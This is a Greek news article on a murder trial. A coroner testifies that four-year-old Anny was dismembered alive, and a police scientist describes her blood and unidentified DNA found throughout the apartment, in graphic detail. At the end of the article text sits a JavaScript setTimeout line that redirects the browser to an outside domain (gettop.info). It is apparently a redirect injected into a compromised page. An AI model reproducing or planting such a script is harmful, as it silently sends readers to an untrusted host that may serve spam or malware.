Φρίκη: Τεμάχισαν ζωντανή την Άννυ – Γεμάτο με αίμα της 4χρονης το διαμέρισμα

0
3

 

Στη συμπληρωματική κατάθεση ενώπιον του Μικτού Ορκωτού Δικαστηρίου ο ιατροδικαστής Νίκος Καρακούκης επέμεινε στην αρχική του τοποθέτηση ότι η μικρή Άννυ που δολοφονήθηκε το Πάσχα του 2015, ήταν ζωντανή όταν την τεμάχισαν.

«Ποιος οριοθέτησε πως το παιδί ήταν νεκρό και ο τεμαχισμός έγινε μετά το θάνατο του;», αναρωτήθηκε ο μάρτυρας απαντώντας με αυτό τον τρόπο στις αιτιάσεις του κατηγορούμενου πατέρα της Άννυ Στανισλάβ Μπακαρτιέβ γνωστού ως Σάββα ο οποίος επιμένει πως τεμάχισε το παιδί ενώ ήταν ήδη νεκρό.

«Πολλές φορές ακόμη και ένας γιατρός δεν μπορεί να το πει με βεβαιότητα ότι κάποιος έχει φύγει από τη ζωή αφού μπορεί να έχει πέσει σε κώμα . Το μυστικό είναι το καρδιογράφημα. (…) Πιστεύω ότι οι διάσπαρτες κηλίδες στο σπίτι έγιναν μόνο από εκτόξευση αίματος. Αποκλείεται εξ ορισμού το,παιδί να τεμαχίστηκε αφού είχε πεθάνει. Ο νεκρός δεν έχει κυκλοφορία αίματος , πίεση, ζωτικά στοιχεία…».

Μάρτυρας: Ο τεμαχισμός έγινε εν ζωή με μαχαίρι…

Πρόεδρος: Υπήρχε άλλος τρόπος να έγινε ο τεμαχισμός; Μπορεί να έγινε με πριόνι;

Μάρτυρας: Μπορεί να είναι και πριόνι…

Πρόεδρος: Μπορούμε να βγάλουμε κάποιο συμπέρασμα για το είδος του μαχαιριού;

Μάρτυρας: Όχι.

(….)

Η μαρτυρία του ιατροδικαστή αμφισβητήθηκε έντονα από τον συνήγορο υπεράσπισης του κατηγορούμενου πατέρα της 4χρονης. «Σας εκθέτουν τα ευρήματα σας», είπε χαρακτηριστικά ο συνήγορος υπεράσπισης.

Στο μεταξύ, για δεύτερη ημέρα κλήθηκε ο ειδικός επιστήμονας της ΕΛΑΣ Στέφανος Λημναίος να εξηγήσει τα ευρήματα που καταγράφει στην έκθεση του στα συμπεράσματα της οποίας αναφέρεται πως κηλίδες αίματος της μικρής βρέθηκαν διάσπαρτες σε πολλά σημεία του σπιτιού.

Οπως γράφει ο «Ελεύθερος Τύπος», από τη σάρωση του ειδικού μηχανήματος το οποίο ανιχνεύει ίχνη DNA ακόμη και αν έχει επιχειρηθεί να καθαριστεί όπως στην περίπτωση της δολοφονίας της Άννυ, προέκυψε, όπως κατέθεσε ο μάρτυρας, πως κηλίδες αίματος της 4χρονης εντοπίστηκαν στη μέση του τοίχου στο χωλ του σπιτιού , κάτω από κομοδίνο και κοντά σε ραφιέρα στον ίδιο χώρο . Επίσης , αίμα βρέθηκε στο πάτωμα, σε σοβατεπί της εισόδου αλλά και σε πάπλωμα.

«Σε πολλές από αυτές τις περιπτώσεις έγινε ανίχνευση και ταυτοποίηση αίματος της Άννυ και η έρευνα έδειξε μονό προφίλ της μικρής», είπε ο μάρτυρας συμπληρώνοντας πως εντοπίστηκε κηλίδα σε σοβατεπί όπου καταγράφεται βιολογικό υλικό της Άννυ μαζί με του κατηγορουμένου Νασίφ Αχμέντοφ ή Νικολάι και ενός αγνώστου προσώπου.

Ο κ. Λημναίος κατά την κατάθεσή του αναφέρθηκε και σε στοιχεία που εντοπίστηκαν στο διαμέρισμα και μαρτυρούν την παρουσία στον χώρο και ενός αγνώστου προσώπου. Το βιολογικό υλικό του αγνώστου εντοπίστηκε στο πάτωμα, σε σοβατεπί αλλά και σε μια πετσέτα που ήταν γεμάτη αίμα.

Αν και ο μάρτυρας διευκρίνισε πως δεν μπορεί να πει με βεβαιότητα πως πρόκειται για το ίδιο πρόσωπο μίλησε για ορφανά μείγματα για τα οποία υπάρχει η δυνατότητα ταυτοποίησης στην περίπτωση που βρεθεί υλικό.

Η αναλυτική περιγραφή των στοιχείων δημιούργησε την εικόνα ενός διαμερίσματος που πριν καθαριστεί ήταν πλημμυρισμένο με αίμα γεγονός που οδήγησε τον συνήγορο των παππούδων της Άννυ να υποβάλει αίτημα για να προσκομιστούν στο δικαστήριο οι φωτογραφίες από τον χώρο του εγκλήματος που ελήφθησαν από το ειδικό κλιμάκιο της ΕΛΑΣ κατά τη συλλογή των στοιχείων.

Επιπλέον, ο συνήγορος υπεράσπισης του κατηγορούμενου Νικολάι ζήτησε να έρθει και να καταθέσει στο δικαστήριο η ειδική επιστήμονας που έκανε τη συλλογή των στοιχείων από τον τόπο του εγκλήματος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here